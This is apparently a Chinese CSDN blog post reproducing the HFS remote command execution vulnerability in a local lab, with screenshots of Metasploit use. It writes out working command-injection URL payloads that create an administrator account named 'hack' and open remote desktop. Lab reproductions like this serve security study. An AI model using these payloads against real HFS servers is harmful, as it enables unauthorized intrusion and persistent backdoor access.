远程执行_HFS远程命令执行漏洞复现

本文介绍了在Windows Server 2003和Windows 10上复现HFS远程命令执行漏洞的过程。在Windows 10中需以管理员权限执行。提供了漏洞程序下载链接,展示了web服务界面及搜索处的漏洞。详细步骤包括手工利用payload添加管理员账户,开启3389端口,以及使用msf模块进行利用,最终成功获取system权限。
摘要由CSDN通过智能技术生成

这里说一下,在Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题。再Windows 10中尝试复现时发现权限不足,需要以管理员权限执行漏洞程序。

漏洞程序下载地址见评论

运行程序截图如下

f67e2c7221877b250395a2ec5a0192c4.png

尝试访问该软件提供的web服务

88931775fe5dabbd78f3ebd0b22c00cd.png

web服务是这个样子的,这个web服务的搜索处存在漏洞

一、手工利用

payload如下

http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos命令.} http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos命令.}12

完整利用过程如下使用如下payload添加一个管理员账户

http://127.0.0.1/?search==%00{.exec|cmd /c net user hack 123 /add.} 1

添加用户:hack密码:123

1ed42dd1d6d280247ac997d50a9ccace.png

将用户hack添加到Administrators组。

http://127.0.0.1/?search==%00{.exec|cmd /c net localgroup Administrators hack /add.}1
f4daf8b82e3d77ef7a6e1d4b02c2ca86.png

开启3389远程端口

11973adedd1f493506d96fdde1265018.png

使用远程连接工具连接,连接成功。

bbee688e4a0f9006ac8573be8924e3f8.png

2、使用msf利用

启动Metasploit,搜索hfs漏洞利用模块

c93e58122fb48bb587c311c7d6eb29d7.png

加载模块,并设置目标IP

83de6b8b1c857e1ac03635a7c499d433.png

设置payload,以及本机IP

4cdf640acc0ff381bcdd6829ded3c3a8.png

开始执行

30e42f46166ae3bba1024384f4d74297.png

成功获得system权限

e2a03cdbc8b0fb161dc35e52153d1eb6.png
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值